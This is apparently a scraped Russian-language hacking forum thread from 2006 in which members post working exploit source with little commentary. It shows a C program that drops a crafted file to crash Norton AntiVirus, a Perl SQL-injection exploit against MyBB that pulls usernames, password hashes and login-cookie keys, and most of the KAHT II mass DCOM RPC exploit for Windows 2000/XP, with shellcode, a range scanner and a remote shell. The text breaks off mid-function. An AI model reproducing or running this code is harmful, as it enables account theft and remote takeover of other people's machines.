"\x8D\x21\x3B\x17\x38\x2C\x06\x3D\x0B\xE7\x13\x6E\x0E\x0F\x1E\x5E" "\xE8\x3D\xEB\xC9\x2D\xD2\x4B\x3C\x89\x5F\x9F\x3E\xBD\xB8\xE4\xD2" "\xAD\x20\x7F\x72\xBB\x73\xF4\xC9\x97\x32\x46\x0D\xD1\x4F\x27\x4E" "\x25\x12\x79\xAA\x75\x95\xA4\x03\x44\x54\x42\x31\x45\xE2\x4B\x92" "\xCD\xED\xB4\x34\xC1\xA7\x42\x17\x63\xE3\x48\xAC\xA2\xA5\x97\x47" "\x4C\x49\x7E\x65\x84\xA1\xF6\xCC\x71\x59\xDC\xE8\x5F\xD4\x1A\x5C" "\xD8\x3E\x72\xFF\x0E\xE3\x36\xB4\xD8\xE1\xCF\x67\xB4\xDC\xFE\xAA" "\x3D\x57\x37\x2E\x5F\x37\x42\xF9\x58\xDD\xBC\xF7\xE0\xF4\x5D\x9F" "\x2E\x4A\x34\x9B\xD3\x28\x1A\x9D\x55\x91\x92\x5E\xFE\xCA\x1F\x2B" "\xF0\x64\x62\x76\xA9\x55\xD4\x24\x3A\x28\x41\xA9\x69\x8E\x8C\x91" "\xF7\xF1\x97\xBE\xE3\x78\x32\xEE\x85\x56\xE5\x53\x33\x3B\x64\x51" "\xF5\x23\xEF\x56\x22\xA1\xC8\x75\x5B\x1A\xC7\xF0\x79\xC2\xB7\xA6" "\x51\x6A\xF8\xD6\x7F\x1E\x7E\xF4\x53\xD3\x0A\xF8\x86\xFF\xDB\x3F" "\x8A\xED\xDF\xA9\xC4\xDF\xC2\x3A\xFF\x50\xFB\x5B\x33\xB8\x69\x5E" "\xF5\x91\xF6\xCF\x7E\x82\x71\xCB\x2B\x96\x1F\x03\xDF\xFB\x0A\xCA" "\xE6\x62\x3F\x5F\x64\x9D\xAF\x7C\x5A\xFB\xE4\x97\x1A\xA3\xE7\xE8" "\x6B\x8C\xB0\xFD\x52\x43\xEA\x97\x1A\xA4\x5F\x6A\xE0\x37\xD0\xD7" "\x68\x13\xA2\xAF\xA1\xAD\xF1\xBF\xE0\xAA\x8E\x52\x02\x2E\x09\x39" "\xD7\xF0\x7A\x75\x49\x3A\x26\x79\xFD\xC2\xCD\xAE\x57\x83\xDA\xD5" "\x0F\x2F\x3B\x5C\x8D\x9C\xFF\x1C\x21\xE0\x15\xC0\xD1\x9A\xB3\x86" "\x2D\x94\x7E\x4B\xD2\x7F\xA7\x54\xE8\x9C\x43\xD2\x1F\x5F\xCA\x76" "\x28\x3F\xBD\xAD\xD8\xFA\x8F\x80\xFA\x0F\xDA\x0E\xA7\x38\x5F\x1F" "\x38\x37\x7F\x3C\x5F\x7D\x4C\xC7\xA4\x35\xC7\x70\xA5\x70\xC0\x5E" "\x33\xA1\x1F\x13\xB5\x22\x9B\x36\x7F\x3C\x92\x6B\x6C\x50\xB6\x35" "\x07\xF3\x7B\x61\x50\x27\x49\xDF\xC9\xE7\x70\xC2\x0A\x3A\x21\x33" "\x48\x77\xBF\xF2\x07\x6D\x2F\x5D\xDD\xBE\xE0\x8C\xCD\xE5\x33\x6B" "\xC8\xDE\xAF\x6D\x75\x91\xC2\x07\x79\x6A\xCF\xB6\xAC\x73\x58\xFC" "\x7F\x4B\x28\x83\x25\xC0\x12\x60\x09\xB0\x04\x58\x02\x2C\x01\x96" "\x00\x4B\x30\x61\x89\xBD\x60\x09\xB0\x04\x58\x02\x2C\x01\x96\x00" "\x4B\x80\x25\xC0\x12\x4C\x58\x42\x09\x2C\x01\x96\x00\x4B\x80\x25" "\xC0\x12\x60\x09\xB0\x04\x58\x82\x09\x4B\xA8\x82\x25\xC0\x12\x60" "\x09\xB0\x04\x58\x02\x2C\x01\x96\x00\x4B\x30\x61\x09\x35\xB0\x04" "\x58\x02\x2C\x01\x96\x00\x4B\x80\x25\xC0\x12\x60\x09\x26\x2C\xA1" "\x0E\x96\x00\x4B\x80\x25\xC0\x12\x60\x09\xB0\x04\x58\x02\x2C\xC1" "\x84\x25\x34\xC0\x12\x60\x09\xB0\x04\x58\x02\x2C\x01\x96\x00\x4B" "\x80\x25\x98\xB0\x84\x26\x58\x02\x2C\x01\x96\x00\x4B\x80\x25\xC0" "\x12\x60\x09\xB0\x04\x13\x96\x40\x83\x25\xC0\x12\x60\x09\xB0\x04" "\x58\x02\x2C\x01\x96\x00\x4B\x30\x61\x89\x63\x60\x09\xB0\x04\x58" "\x02\x2C\x01\x96\x00\x4B\x80\x25\xC0\x12\x4C\x58\x02\x0B\x96\x00" "\x4B\x80\x25\xC0\x12\x60\x09\xB0\x04\x58\x02\x2C\xC1\x84\x25\xDC" "\xC0\x12\x60\x09\xB0\x04\x58\x02\x2C\x01\x96\x00\x4B\x80\x25\x98" "\xB0\x84\x3B\x58\x02\x2C\x01\x96\x00\x4B\x80\x25\xC0\x12\x60\x09" "\xB0\x04\x13\x96\xF0\x00\x4B\x80\x25\xC0\x12\x60\x09\xB0\x04\x58" "\x02\x2C\x01\x96\x60\xC2\x12\x9E\x60\x09\xB0\x04\x58\x02\x2C\x01" "\x96\x00\x4B\x80\x25\xC0\x12\xFF\x6C\x89\x0D\x2C\x5B\x10\xFF\xAC" "\x89\x1F\xD7\x0E\x44\xF9\x79\xC4\x4F\x5B\xA8\x7C\xB7\x05\xE3\x39" "\x13\x4E\xFA\xB3\xCB\x19\xCF\xA5\x09\xD0\x9F\x53\xCA\x78\xEE\x13" "\x92\xFE\x4C\x32\xC6\x73\x4A\x3B\xE9\xCF\x1F\x61\x3C\x17\x26\x43" "\xBF\xD7\x38\xE3\xB9\x26\x65\xFA\x7D\x45\x19\xCF\x6D\xD1\xA2\xDF" "\x43\x8C\xF1\x9C\xAB\x2E\xFD\x7E\x21\x8C\xE7\xEE\x18\xD1\xAF\x0D" "\x66\x3C\xB7\x6C\x49\xBF\x0E\x88\xF1\xDC\x1F\x8E\xF4\x73\x7E\x19" "\xCF\x25\xBA\xD1\xCF\xEF\x61\x3C\xD7\xEB\x4D\xFF\x2F\x8F\xF1\xDC" "\x6E\x7F\xFA\xEF\x76\x8C\xE7\xFC\xC3\xE8\x8D\x6E\x61\xCC\xBE\xF1" "\xFB\x88\xC0\xB7\xFB\x1C\x2B\x02\xF1\x30\xE2\xFB\xCB\x7F\x03\x50" "\x4B\x01\x02\x14\x00\x14\x00\x02\x00\x08\x00\x1B\xAD\x7C\x28\x93" "\x75\xDC\xC8\xF9\x09\x00\x00\x56\x88\x00\x00\x09\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x20\x00\xB6\x81\x00\x00\x00\x00\x6C\x69\x62" "\x20\x30\x2E\x7A\x69\x70\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00" "\x01\x00\x37\x00\x00\x00\x20\x0A\x00\x00\x00\x00"; int main(int argc, char* argv[]) { FILE *NKfile; char filenameX[200];
printf("Norton AntiVirus Crash by NAV.kill File & Hide Virus \n"); printf(" Coded by: JAAScois - Web site : www.jaascois.com\n"); ZeroMemory(filenameX,200); CreateDirectory("c:\\NAVdir",NULL); strcpy(filenameX,"c:\\NAVdir\\NAV.kill");
NKfile=fopen(filenameX,"w+b"); if(NKfile==NULL){ printf("-Error: fopen \n"); return 0; }
fwrite(NAVkill,2669,1,NKfile); fclose (NKfile);
printf("- Created file: NAV.kill ...OK\n- Now scan this folder [C:\\NAVdir\\] by Norton AntiVirus to Crash !\n\n"); return 0; }
| |
| |
10.03.2006 - 8:38 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| MyBB Forum SQL Injection ExploitЗатронутые продукты:PHPNUKE:phpNuke 7.8 MANTIS:Mantis 1.0 WORDPRESS:Wordpress 2.0 DELTASCRIPTS:PHP Classifieds 6.20 DOTPROJECT:dotproject 2.0 MYBB:MyBB 1.03 Сплойт: #!/bin/env perl #//------# #// MyBB Forum SQL Injection Exploit .. By HACKERS PAL # #// Greets For Devil-00 - Abducter - Almaster - GaCkeR # #// Special Greets For SG (SecurityGurus) Team And Members # #// http://WwW.SoQoR.NeT # #//------# use LWP::Simple; print "\n#####################################################"; print "\n# MyBB Forum Exploit By : HACKERS PAL #"; print "\n# Http://WwW.SoQoR.NeT #"; if(!$ARGV[0] or !$ARGV[1]) { print "\n# -- Usage: #"; print "\n# -- perl $0 [Full-Path] [User ID] #"; print "\n# -- Example: #"; print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #"; print "\n# Greets To Devil-00 - Abducter - GaCkeR #"; print "\n#####################################################"; exit(0); } else { print "\n# Greets To Devil-00 - Abducter - GaCkeR #"; print "\n#####################################################"; $web=$ARGV[0]; $id=$ARGV[1]; $url = "showteam.php?GLOBALS[]=1&comma=/*"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; $page =~ m/FROM (.*)users u WHERE/; $prefix=$1; if(!$1) { $prefix="mybb_"; } $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,username,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,1,4%20from%20".$prefix. "users%20where%20uid=$id/*"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; print "\n[+] Connected to: $ARGV[0]\n"; print "[+] User ID is : $id "; print "\n[+] Table Prefix is : $prefix"; $page =~ m/ (.*)<\/i><\/b>/ && print "\n[+] User Name : $1"; print "\n[-] Unable to retrieve User Name\n" if(!$1); $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,password,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix. "users%20where%20uid=$id/*"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; $page =~ m/(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n"; die("\n[-] Unable to retrieve The Hash of password\n") if(!$1); print"\n[!] Watch out ... The Cookie Value is comming\n"; $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,loginkey,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix. "users%20where%20uid=$id/*"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; $page =~ m/(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n"; print "[-] Unable to retrieve Login Key\n" if(!$1); }
# WwW.SoQoR.NeT | |
| |
11.03.2006 - 22:48 |
ZaHack
Большой Брат
Группа: Заблокированные Сообщений: 1.252 Регистрация: 24.01.2006 Из: Where The Eagles Fly Пользователь №: 333
Респектов: 117
| Исходник известнейшего сплоита KAHT2!!. Для получения админских прав на win NT-family cистемах: » Нажмите, для открытия спойлера « #include #include #include #include #include #ifdef WIN32 #include #include #include #include #include #pragma comment (lib,"ws2_32.lib") #else #include #include #include #include #include #include #include #include #include #include #include #endif
#define MAX_THREADS 512 #define NTHREADS 50 #define PORT 135 #define CONNECT 6 //Connect Timeout #define RECV 5 //recv Timeout #define ATTACKTIMEOUT 5 // #define RPC_FINGERPRINT_TIMEOUT 6 //rpc fingerprint #define INITRPORT (rand()/2)+32767 //#define INITRPORT 53 //PORT TO SPAWN A SHELL
int RPORT,salir=0,threads=0,rpcopen=0; //int AUTOHACKING=0; int ip1[4],ip2[4]; FILE *results; //results.txt ips con el puerto 135 abierto #ifndef WIN32 #define CRITICAL_SECTION pthread_t #endif CRITICAL_SECTION cs,css,cslog,csshell; //Givemeip CS, number of threads, ipstologfile,shell()
//Ultra Fast port Scanner char *givemeip(char *ip); void checkea(void *threadn); //Macro Functions.. void show_macros(int sock2); void execute_macro(char opt,int sock2); void macro(char opt, int sock2); //Exploit Code... void attack(char *linea,int peta); int shell (int sock2); void readconsole(void *sock2); //me void banner(void); // remote Install int InstallRemoteServiceNbt (char *ip); int InstallRemoteServiceFtp (char *ip);
unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char winshellcode[]= "\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00" "\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae" "\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20" "\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00" "\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00" "\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00" "\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" "\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" "\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57" "\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" "\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00" "\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xa6\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xa4\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00" "\x00\x00\x00\x46\x07\x00\x00\x00\x60\x00\x00\x00\x58\x00\x00\x00" "\x90\x00\x00\x00\x40\x00\x00\x00\x20\x00\x00\x00\x38\x03\x00\x00" "\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc" "\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc" "\x48\x00\x00\x00\x07\x00\x66\x00\x06\x09\x02\x00\x00\x00\x00\x00" "\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00" "\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93" "\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x18\x43\x14\x00\x00\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00" "\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00" "\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00" "\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00" "\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a" "\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00" "\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00" "\x00\x00\x00\x00\x03\x00\x00\x00\x46\x00\x58\x00\x00\x00\x00\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff" "\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00" "\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" "\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00" "\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00" "\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00" "\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00" "\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc" "\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00" "\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00" "\x07\x00\x00\x00\x00\x00\x00\x00";
struct { char *os; u_long ret; } targets[] = { { "[Win2k]", 0x0018759F }, { "[WinXP]", 0x0100139d }, };
//GLOBALS...
/***************/
void banner(void) { printf ("_______________ \n"); printf(" KAHT II - MASSIVE RPC EXPLOIT\n"); printf(" DCOM RPC exploit. Modified by [email protected]\n"); printf(" #haxorcitos && #localhost @Efnet Ownz you!!!\n"); printf ("______________\n\n");
} void usage(void) { printf(" Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]\n"); printf(" example: KaHt2.exe 192.168.0.0 192.168.255.255\n"); printf("\n NEW!: Macros Available in shell enviroment!!\n Type !! for more info into a shell.\n"); //printf(" If AUTOHACKING ENABLED MACRO !9 WILL BE EXECUTED\n"); exit(1); }
/***************/ /**************/ void execute_macro(char opt,int sock2){
FILE *macro; char cadena[512]; char tmp[512]; int found=0; int delay=500; //configurable TIMEOUT FOR CMDS - Default=500 if ((macro=fopen("macros.txt","r")) !=NULL) { while (!feof(macro)) { memset(cadena,'\0',sizeof(cadena)); fgets(cadena,sizeof(cadena)-1,macro); cadena[strlen(cadena)-1]='\0'; if ((found==1) && (( strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) ) { fclose(macro); printf(" + Ejecucion de La Macro Terminada\n"); fclose(macro);return;} if (( strncmp(cadena,"delay=",strlen("delay="))) ==0) delay=atoi(cadena+6);
if (( strncmp(cadena,"key=",strlen("key="))) ==0) if (( cadena+strlen("key=!"))[0]==opt) found=1; //OUR CMDS ARE HERE!
if ( (( strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) ) if (strlen(cadena)>strlen("cmd= ")) { strcpy(tmp,cadena+4); strcat(tmp,"\r\n"); send(sock2,tmp,strlen(tmp),0); //printf("Enviado: %s! de tamaсo: %i\n",tmp,sizeof(tmp)); sleep(delay); } } fclose(macro); send(sock2,"\n",strlen("\n"),0); printf(" - Macro Done -\n"); }
sleep(25);
}
/**************/ void show_macros(int sock2){ FILE *macro; char cadena[512];
printf(" +______________(Available Macros)______________\n"); if ((macro=fopen("macros.txt","r")) !=NULL) { while (!feof(macro)) { memset(cadena,'\0',512); fgets(cadena,sizeof(cadena)-1,macro); if (strlen(cadena)>1) { cadena[strlen(cadena)-1]='\0'; if (( strncmp(cadena,"name=",strlen("name="))) ==0) printf(" + Nombre: %s ",cadena+strlen("name=")); if ((strncmp(cadena,"key=",strlen("key="))) ==0) printf("Trigger: %s\n",cadena+strlen("key=")); } } fclose(macro); } send(sock2,"\n",strlen("\n"),0); sleep(10);
} /**************/
void macro(char opt, int sock2) { switch(opt) { case '!': show_macros(sock2); break; default: execute_macro(opt,sock2); break; } }
/**************/ void readconsole(void *sock2) { int l; char buf[512];
/*if (AUTOHACKING) { execute_macro('9',(int) sock2); salir=1; } */ while(!salir) { l = read (0, buf, sizeof (buf)); if (l <= 0) salir=1; else { if ( (l==3) && (buf[0]=='!') ) macro(buf[1],(int)sock2); else { send((int)sock2,buf,l,0); if (strncmp(buf,"exit",strlen("exit")) ==0) { salir=1; _endthread(); } } } }
}
void enviamacro(void *sock2) { sleep(500);
macro(9,(int)sock2); salir=1; _endthread();
}
/*************/ int shell (int sock2) /* NOT RIPPED FROM TESO */ { int l; char buf[512]; salir=0; _beginthread(readconsole,4096,(void *)(int) sock2); while (!salir) { if ((l=recv (sock2, buf, sizeof (buf),0))>0) write (1, buf, l); else sleep(100);
} printf("\n - Connection Closed\n"); return (salir); } /**************/
int main(int argc, char **argv) { int i,total=NTHREADS;
#ifdef WIN32 WSADATA ws;
clrscr(); #endif banner();
if(argc<3) usage(); #ifdef WIN32 if (WSAStartup(MAKEWORD(2,0),&ws)!=0) { printf(" WSAStartup Error: %d\n",WSAGetLastError()); exit(1); } #endif sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]); sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);
for(i=0;i<4;i++) { if ( (ip1[i]>255) || (ip1[i]<0) ) usage(); if ( (ip2[i]>255) || (ip2[i]<0) ) usage();
} if (argc==4) total=atoi(argv[3]); // if (argc==5) AUTOHACKING=atoi(argv[4]);
#ifdef WIN32 InitializeCriticalSection(&cs); InitializeCriticalSection(&css); InitializeCriticalSection(&cslog); InitializeCriticalSection(&csshell); #else //Aqui meter los thread de linux y semaforos #endif //ULTRA FAST PORT SCANNER.... if ((results=fopen("results.txt","w"))==NULL) exit(0); printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total); srand ( time(NULL) ); RPORT=INITRPORT; printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT); printf(" [+] Scan In Progress...\n"); for(i=0;i #ifdef WIN32 _beginthread(checkea,8192,(void *)i); #else //Aqui meter los thread de linux y semaforos #endif while(threads>0) sleep(100); fclose(results); printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);
return(0); }
/********************/
//void attack(char *linea,int peta) void attack(char *linea,int peta) { if (peta==-1) return;
// if (AUTOHACKING!=1) #ifdef WIN32 struct timeval tv; #else struct time_t tv; #endif struct sockaddr_in target_ip; int sock,sock2; //Exploit Socket && Shell Socket unsigned short port = 135;
